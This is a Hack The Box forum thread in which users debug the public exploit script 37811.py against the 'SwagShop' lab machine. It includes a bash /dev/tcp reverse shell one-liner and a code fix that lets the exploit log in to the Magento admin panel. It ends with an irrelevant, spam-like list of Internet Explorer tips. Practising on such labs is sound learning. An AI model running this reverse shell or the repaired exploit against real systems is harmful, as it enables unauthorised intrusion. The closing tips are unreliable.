SwagShop - errors in script 37811.py

Hi guys,

I’m pretty new on HTB and trying to hack my first machine “SwagShop”.

I am using following command to get the reverse shell: python 37811.py http://10.10.10.140/index.php/admin/ ‘bash -c “bash -i >& /dev/tcp/10.10.13.xxx/9001 0>&1”’

In the config section of the script I’ve set the right user, password and also the correct install date. Also tryed burp suite to find out whats wrong but no clue.

attached my output:
root@kali:~# python 37811.py http://10.10.10.140/index.php/admin/ ‘bash -c “bash -i >& /dev/tcp/10.10.xx.xx/9001 0>&1”’

Traceback (most recent call last):
File “37811.py”, line 55, in
br[‘login[username]’] = username
File “/usr/lib/python2.7/dist-packages/mechanize/_mechanize.py”, line 796, in setitem
self.form[name] = val
File “/usr/lib/python2.7/dist-packages/mechanize/_form_controls.py”, line 1963, in setitem
control = self.find_control(name)
File “/usr/lib/python2.7/dist-packages/mechanize/_form_controls.py”, line 2355, in find_control
return self._find_control(name, type, kind, id, label, predicate, nr)
File “/usr/lib/python2.7/dist-packages/mechanize/_form_controls.py”, line 2446, in _find_control
description)
mechanize._form_controls.AmbiguityError: more than one control matching name ‘login[username]’

Thanks for any advice.

BR
d3vided

This error results because for whatever reason, Mechanize is seeing multiple username/password fields. The index parameter must be used to select the correct one. Comment out the following in the script:

#br.form.new_control('text', 'login[username]', {'value': username})  # Had to manually add username control.
#br.form.fixup()
#br['login[username]'] = username
#br['login[password]'] = password

And replace it with this:

userone = br.find_control(name="login[username]", nr=0)
userone.value = username
pwone = br.find_control(name="login[password]", nr=0)
pwone.value = password

This should fix the issue and allow Mechanize to log in. Note that more modification to the script will be required per the Ippsec video and official write-up.

Hey Ruri. works great thx. :slight_smile:

I tried this as well but I can’t get it working. I execute the scripts with the changes made and then I hit enter and nothing happens. No error message but also no shell.

Type your comment> @II0 said:

I tried this as well but I can’t get it working. I execute the scripts with the changes made and then I hit enter and nothing happens. No error message but also no shell.

I refreshed the value of install_date, when I modified the exploit script. It is stored on a file that you can find by directory browsing through your web connection.

Tips to fix-
Turn Off Scripting Errors in IE.
Make Sure IE Isn’t Blocking Important Scripting Features.
Delete Temporary Internet Files.
Allow for Pop-ups in Your Browser.
Update Your Software.
Check Your Security Software.
Reset All of Internet Explorer’s Settings.
Disable Smooth Scrolling.

Regards,
Rachel Gomez